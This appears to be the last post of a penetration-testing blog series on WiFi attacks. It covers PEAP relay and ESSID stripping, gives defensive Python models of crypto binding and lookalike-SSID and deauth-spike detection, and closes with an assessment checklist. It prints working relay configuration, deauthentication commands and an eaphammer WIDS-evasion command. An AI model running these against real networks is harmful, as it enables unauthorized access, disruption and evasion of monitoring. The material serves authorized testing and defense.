WiFi Hacking 101: Wrapping Up the Series (Part 4)

8 min read

March 1, 2026


👋 Introduction

Hey everyone!

Last week we covered enterprise WiFi exploitation. The 802.1X architecture. EAP methods and their weaknesses. Credential capture with Evil Twin. Legacy method exploitation (PAP, EAP-MD5). Pass-the-Hash using captured NT hashes directly in wpa_supplicant.

This week we close the series with the two techniques that sit at the top of the enterprise WiFi attack chain: PEAP relay and ESSID stripping. Then a wireless assessment checklist you can use on your next engagement.

Let’s finish strong 👇

⚡ PEAP Relay Attack

PEAP relay was introduced in 2018 by Michael Kruger and Dominic White in their paper “Practical attacks against WPA-EAP-PEAP.” It’s categorically different from what we covered last week.

Credential capture attacks (eaphammer, hostapd-wpe) require the victim to connect to your rogue AP; you then crack the captured NetNTLMv1 hash offline. PEAP relay skips cracking entirely. You forward the victim’s live authentication exchange to the real network. The RADIUS server authenticates it. You get network access.

No hash. No cracking. No password.

Key constraints:

  • Works with PEAP+MSCHAPv2 only. Not TTLS+MSCHAPv2.
  • Requires at least 3 wireless adapters.
  • Timing matters. Complex setup.

Why This Works

The IEEE 802.1X standard trusts that EAP frames come from legitimate sources. Without cryptographic binding, there’s nothing tying the authentication session to the physical client that started it. You’re just a frame forwarder. The RADIUS server can’t tell.

The relay depends on crypto_binding=0 in the PEAP exchange. Crypto binding (documented in RFC 5281) links the outer TLS tunnel to the inner MSCHAPv2 session. When disabled, you can relay one without the other. Many enterprise networks still accept crypto_binding=0 for backwards compatibility with legacy clients.

Attack Architecture

[Victim] ---> [Rogue AP (berate-ap)] ---> [wpa_sycophant] ---> [Legit AP] ---> [RADIUS]

Three components, three adapters running simultaneously.

berate_ap (SensePost/Orange Cyberdefense) acts as the rogue AP. It intercepts the victim’s EAP frames and passes them to wpa_sycophant.

wpa_sycophant (SensePost) is a patched wpa_supplicant that relays those frames to the legitimate AP. It connects to the real network on behalf of the victim.

The DoS adapter forces the victim off the real AP so they reconnect to yours.

wpa_sycophant Configuration

network={
    ssid="CorporateWiFi"
    scan_ssid=1
    key_mgmt=WPA-EAP
    identity=""              # Leave blank
    anonymous_identity=""    # Leave blank
    password=""              # Leave blank
    eap=PEAP
    phase1="crypto_binding=0 peapver=0"
    phase2="auth=MSCHAPV2"
    bssid_blacklist=AA:BB:CC:DD:EE:FF  # MAC of your berate-ap interface
}

bssid_blacklist is critical. It prevents wpa_sycophant from connecting to your own rogue AP and creating an infinite loop. Set it to the MAC of the berate_ap interface.

If peapver=0 doesn’t work, try peapver=1.

Execution

Interface 1 (managed mode) - Rogue AP:

berate_ap --eap --mana-wpe --wpa-sycophant --no-virt --mana-credout lo wlan0 'CorporateWiFi'

Interface 2 (managed mode) - Relay:

wpa_sycophant -c sycophant.conf -i wlan1

Interface 3 (monitor mode) - Temporary DoS:

iw dev wlan2 set channel 6
timeout 5 aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF --ignore-negative-one wlan2mon

The deauth burst is temporary by design. You only need the victim to look for an AP once. Keep wlan2 available; you may need to repeat the DoS if the victim reconnects to the real AP before wpa_sycophant establishes the relay.

Once wpa_sycophant connects to the real network it should obtain an IP automatically. If not, run dhclient wlan1 manually.

What Stops This

Enforced crypto binding: If the RADIUS server requires crypto_binding=1, the relay fails. The cryptographic binding links the outer TLS tunnel to the inner MSCHAPv2 session. You can’t split them. FreeRADIUS supports this via crypto_binding = require in the PEAP module config, but it’s rarely deployed.

EAP-TLS: Immune entirely. No passwords are transmitted. Mutual certificate-based auth means you’d need the client’s private key to impersonate it.
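To make the “Why This Works” and “What Stops This” points concrete, here is an added model (not code from the post, from wpa_sycophant, or from berate_ap) of what crypto binding changes. The key derivation is a deliberately simplified stand-in (HMAC-SHA256 over labelled inputs), not the real MS-PEAP Compound MAC computation; the structure is what matters: the binding value depends on both the outer TLS tunnel secret and a key that only a password holder can derive from the inner MSCHAPv2 exchange. A relay terminates the victim’s TLS tunnel and opens its own to the real network, so it ends up with two different tunnel secrets and no inner key.

```python
import hashlib
import hmac
import os

PASSWORD = b"constructed-demo-password"   # constructed credential for the model


def derive_inner_key(password: bytes) -> bytes:
    """Stand-in for the key material the inner MSCHAPv2 exchange yields to both
    endpoints. Only a party that knows the password (client, RADIUS) gets it;
    a relay that merely forwards challenge/response frames does not."""
    return hashlib.sha256(b"inner-method-key|" + password).digest()


def compound_mac(tunnel_key: bytes, inner_key: bytes) -> bytes:
    """Simplified crypto-binding value: keyed over the OUTER tunnel secret and the
    INNER method key, so it is specific to one TLS tunnel and one password holder.
    (Not the MS-PEAP derivation; same dependency structure.)"""
    return hmac.new(tunnel_key, b"crypto-binding|" + inner_key, hashlib.sha256).digest()


def new_tunnel_key() -> bytes:
    """Secret established by a TLS handshake; every tunnel gets its own."""
    return os.urandom(32)


def peap_authenticate(crypto_binding_required: bool, relayed: bool) -> bool:
    """Return True if the RADIUS side accepts the session.
    relayed=False: client <-TLS-> server, a single tunnel.
    relayed=True : client <-TLS A-> relay <-TLS B-> server; the relay forwards the
    inner MSCHAPv2 frames between the two tunnels."""
    client_inner = derive_inner_key(PASSWORD)   # client: from its password
    server_inner = derive_inner_key(PASSWORD)   # server: from its stored credential
    if relayed:
        client_tunnel = new_tunnel_key()        # tunnel A (client <-> rogue AP)
        server_tunnel = new_tunnel_key()        # tunnel B (relay <-> real network)
    else:
        client_tunnel = server_tunnel = new_tunnel_key()

    # The inner challenge/response is genuine either way: the real client answers it.
    inner_mschapv2_ok = True
    if not crypto_binding_required:
        # crypto_binding=0: the server never checks that the inner result belongs
        # to the tunnel it is looking at, so the forwarded exchange is accepted.
        return inner_mschapv2_ok

    # The client binds its result to ITS tunnel; the relay can only forward that value.
    client_binding = compound_mac(client_tunnel, client_inner)
    expected = compound_mac(server_tunnel, server_inner)
    return inner_mschapv2_ok and hmac.compare_digest(client_binding, expected)


def relay_can_forge_binding(guessed_password: bytes) -> bool:
    """The relay knows both tunnel secrets but not the password. Forging a binding
    for tunnel B requires the inner key, i.e. it collapses back to guessing the
    password, which is exactly the cracking step the relay was meant to avoid."""
    server_tunnel = new_tunnel_key()
    expected = compound_mac(server_tunnel, derive_inner_key(PASSWORD))
    forged = compound_mac(server_tunnel, derive_inner_key(guessed_password))
    return hmac.compare_digest(forged, expected)


if __name__ == "__main__":
    for binding in (False, True):
        for relayed in (False, True):
            print(f"crypto_binding={int(binding)} relayed={relayed}: "
                  f"accepted={peap_authenticate(binding, relayed)}")
    print("relay forges binding with wrong password:", relay_can_forge_binding(b"wrong"))
```

Running it shows the four combinations: a direct session is accepted with or without binding, a relayed session is accepted only when binding is off, and the relay cannot produce a valid binding for its own tunnel without the password. That is the whole reason enforcing crypto binding on the RADIUS side closes the relay path while leaving legitimate clients unaffected.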

🎭 ESSID Stripping

Wireless Intrusion Detection Systems (WIDS) flag rogue APs by matching their SSID against a whitelist of known corporate networks. ESSID stripping defeats this by appending a visually invisible character to the SSID, making it a different string while appearing identical to users.

"CorporateWiFi" and "CorporateWiFi " (with a trailing space) are different strings. The WIDS sees no match. No alert fires.

Invisible characters:

  • Space: \x20
  • Tab: \x09
  • Zero-width space: \xE2\x80\x8B (Unicode U+200B)

A side effect: Apple devices normally group APs with the same SSID under a single network entry, which would reveal your Evil Twin as a suspicious duplicate. ESSID stripping makes the stripped SSID appear as a separate network to Apple clients, eliminating that visual tell.

Using eaphammer

eaphammer’s --essid-stripping flag handles this directly:

python3 ./eaphammer -i wlan0 \
  --auth wpa-eap \
  --essid 'CorporateWiFi' \
  --creds \
  --negotiate balanced \
  --essid-stripping '\x20'

airgeddon applies ESSID stripping automatically during Evil Twin attacks by default, without needing a separate flag.

What It Doesn’t Bypass

Signature-based WIDS: defeated. Behavior-based systems: not affected.

Behavior-based detection monitors for patterns you can’t hide:

  • Deauthentication spikes (volume of deauth frames per client or timeframe)
  • Certificate anomalies (your cert doesn’t chain to the corporate CA)
  • A known BSSID disappearing while a new one appears on the same channel with a nearly identical SSID
  • Unusual EAP negotiation patterns

Modern enterprise WIPS platforms combine both detection methods. ESSID stripping buys you cover against the simpler systems. Don’t treat it as a guarantee.
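The two detection gaps above, exact-match SSID whitelisting and the behavioural signals it lacks, can be shown side by side. The following is an added example, not code from the post or from any WIDS product. It normalizes observed SSIDs (dropping invisible Unicode format characters such as U+200B, applying NFKC, and trimming whitespace like \x20 and \x09) before comparing them to an authorized list, so a stripped SSID is reported as a lookalike rather than as an unknown network, and it runs a sliding-window deauth counter over a constructed frame list. The whitelist, beacon observations, frame records and the 20-frames-per-5-seconds threshold are all constructed assumptions for the demonstration.

```python
import unicodedata

# Constructed whitelist of authorized corporate SSIDs (assumption for the example).
AUTHORIZED_SSIDS = {"CorporateWiFi", "CorporateGuest"}


def normalize_ssid(raw: bytes) -> str:
    """Collapse an SSID to the form a human perceives: drop Unicode format
    characters (category Cf: zero-width space, joiners, BOM), apply NFKC, and
    trim leading/trailing whitespace (\\x20, \\x09, ...)."""
    text = raw.decode("utf-8", errors="replace")
    text = "".join(ch for ch in text if unicodedata.category(ch) != "Cf")
    return unicodedata.normalize("NFKC", text).strip()


def classify_ssid(raw: bytes, authorized=AUTHORIZED_SSIDS) -> str:
    """'authorized' on a byte-exact whitelist match, 'lookalike' when it matches
    only after normalization (the case exact-match WIDS misses), else 'unknown'."""
    exact = raw.decode("utf-8", errors="replace")
    if exact in authorized:
        return "authorized"
    if normalize_ssid(raw) in authorized:
        return "lookalike"
    return "unknown"


def lookalike_beacons(beacons, authorized=AUTHORIZED_SSIDS):
    """Return [(bssid, channel, ssid_text)] for every beacon carrying a lookalike SSID."""
    return [(bssid, ch, raw.decode("utf-8", errors="replace"))
            for bssid, raw, ch in beacons
            if classify_ssid(raw, authorized) == "lookalike"]


def deauth_spikes(frames, window_s=5.0, threshold=20):
    """Sliding-window count of deauth frames per destination client.
    Returns {client: peak_count} for clients that received more than `threshold`
    deauth frames inside any `window_s`-second window."""
    times_by_client = {}
    for ts, subtype, _src, dst in frames:
        if subtype == "deauth":
            times_by_client.setdefault(dst, []).append(ts)
    flagged = {}
    for client, times in times_by_client.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window_s:
                start += 1
            count = end - start + 1
            if count > threshold:
                flagged[client] = max(flagged.get(client, 0), count)
    return flagged


# Constructed beacon observations: (bssid, raw SSID bytes, channel).
BEACONS = [
    ("00:11:22:33:44:01", b"CorporateWiFi", 6),                 # legitimate
    ("00:11:22:33:44:02", b"CorporateGuest", 36),               # legitimate
    ("de:ad:be:ef:00:01", b"CorporateWiFi\x20", 6),             # trailing space
    ("de:ad:be:ef:00:02", b"CorporateWiFi\xe2\x80\x8b", 6),     # zero-width space
    ("aa:bb:cc:dd:ee:ff", b"CoffeeShop", 11),                   # unrelated
]

# Constructed frame records: (timestamp, subtype, src, dst).
VICTIM = "11:22:33:44:55:66"
FRAMES = [(100.0 + i * 0.05, "deauth", "00:11:22:33:44:01", VICTIM) for i in range(25)]   # 25 in ~1.2 s
FRAMES += [(200.0 + i * 30.0, "deauth", "00:11:22:33:44:01", "77:88:99:aa:bb:cc") for i in range(3)]  # sparse
FRAMES += [(100.3, "data", VICTIM, "00:11:22:33:44:01")]

if __name__ == "__main__":
    for bssid, ch, ssid in lookalike_beacons(BEACONS):
        print(f"lookalike SSID {ssid!r} from {bssid} on channel {ch}")
    for client, n in deauth_spikes(FRAMES).items():
        print(f"deauth spike: {n} frames to {client} within 5 s")
```

On the sample data the two stripped beacons are reported as lookalikes of CorporateWiFi while the coffee-shop network stays “unknown”, and only the client that received the 25-frame burst is flagged; the three spread-out deauths to the other client stay under the threshold. Tune the window and threshold to the environment, and pair the SSID check with the channel and BSSID of the beacon so a lookalike appearing on the same channel as a known AP stands out.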

📋 Wireless Assessment Checklist

This is what a complete wireless engagement should cover. Use it as your field guide.

Always confirm scope before starting. Some tests (DoS, network disruption, segmentation, captive portal bypass) require explicit authorization and agreed time windows. Notify stakeholders before running disruptive tests.

Reconnaissance

  • Confirm agreed SSIDs in scope
  • Identify AP models, firmware versions, and known CVEs
  • Check physical access to APs
  • Scan all bands: 2.4 GHz, 5 GHz, and 6 GHz
  • Identify all SSIDs in scope, including hidden networks
  • Detect DFS channel usage
  • Check for existing rogue APs in the RF environment
  • Check wireless client isolation settings
  • Check if passwords are visible in common areas

Open and Personal Networks

  • Attempt WEP cracking on any WEP networks found
  • Capture WPA/WPA2 4-way handshakes and assess passphrase strength
  • Capture PMKIDs (clientless) and assess passphrase strength
  • Try Evil Twin + captive portal against WPA/WPA2 PSK networks
  • Test WPS Pixie Dust, Null PIN, and brute-force
  • Check if WPS PBC is enabled

WPA3 and Transitional Networks

  • Identify WPA2/3 mixed-mode (transitional) networks
  • Test downgrade attack against transitional networks
  • Test Dragon Drain DoS against WPA3 APs
  • Perform online dictionary attack against WPA3-SAE
  • Verify MFP/PMF enforcement status
  • Test DoS resilience on non-MFP networks

Enterprise Networks (MGT / 802.1X)

  • Gather EAP identities and extract username formats
  • Extract AP certificate details: CN, issuer, SANs, expiration, algorithm
  • Enumerate accepted EAP methods (EAP_buster)
  • Check if legacy/weak methods are accepted: PAP, CHAP, EAP-MD5
  • Try Evil Twin credential capture (eaphammer, hostapd-wpe)
  • Capture and crack NetNTLMv1 hashes
  • Capture plaintext credentials if TTLS+PAP is accepted
  • Attempt PEAP relay (wpa_sycophant + berate_ap, 3 adapters)
  • Test Pass-the-Hash authentication with captured NT hashes
  • Verify whether clients enforce CA validation against a known CA
  • Verify certificate robustness: algorithm strength, key length, chain integrity, expiration

WIDS/WIPS Evaluation

  • Identify presence of WIDS/WIPS in the environment
  • Test ESSID stripping to evaluate signature-based detection
  • Check whether deauth attacks trigger alerts
  • Test network segmentation from the wireless segment

🎯 Key Takeaways

PEAP relay changes the calculus on enterprise WiFi. You’re not hoping the password is in your wordlist. You forward the authentication live and walk onto the network. Three adapters, one config file, and a target that accepts crypto_binding=0. The only reliable defenses are enforced crypto binding and EAP-TLS.

ESSID stripping defeats the most common WIDS detection method. One invisible character. That’s the difference between triggering an alert and not. It doesn’t beat behavior-based detection, but it removes the easiest catch.

The checklist is your pre-flight. Each item represents a finding category. Work through it on every engagement. The most consistent enterprise WiFi findings are PEAP without CA validation, legacy EAP methods left enabled, and WPS still active on APs that should have had it disabled years ago.


That wraps up the WiFi series.

Four issues. Hardware and fundamentals. WPA/WPA2 cracking, PMKID, WPS, and WPA3. Enterprise credential capture, Pass-the-Hash, and EAP method exploitation. PEAP relay and ESSID stripping.

Build a lab. FreeRADIUS on a Raspberry Pi. Practice until the 802.1X flow makes sense at the frame level. These attacks work because organizations optimize for compatibility. Your job is to find where they made that trade-off.

Thanks for reading, and happy hunting!

— Ruben
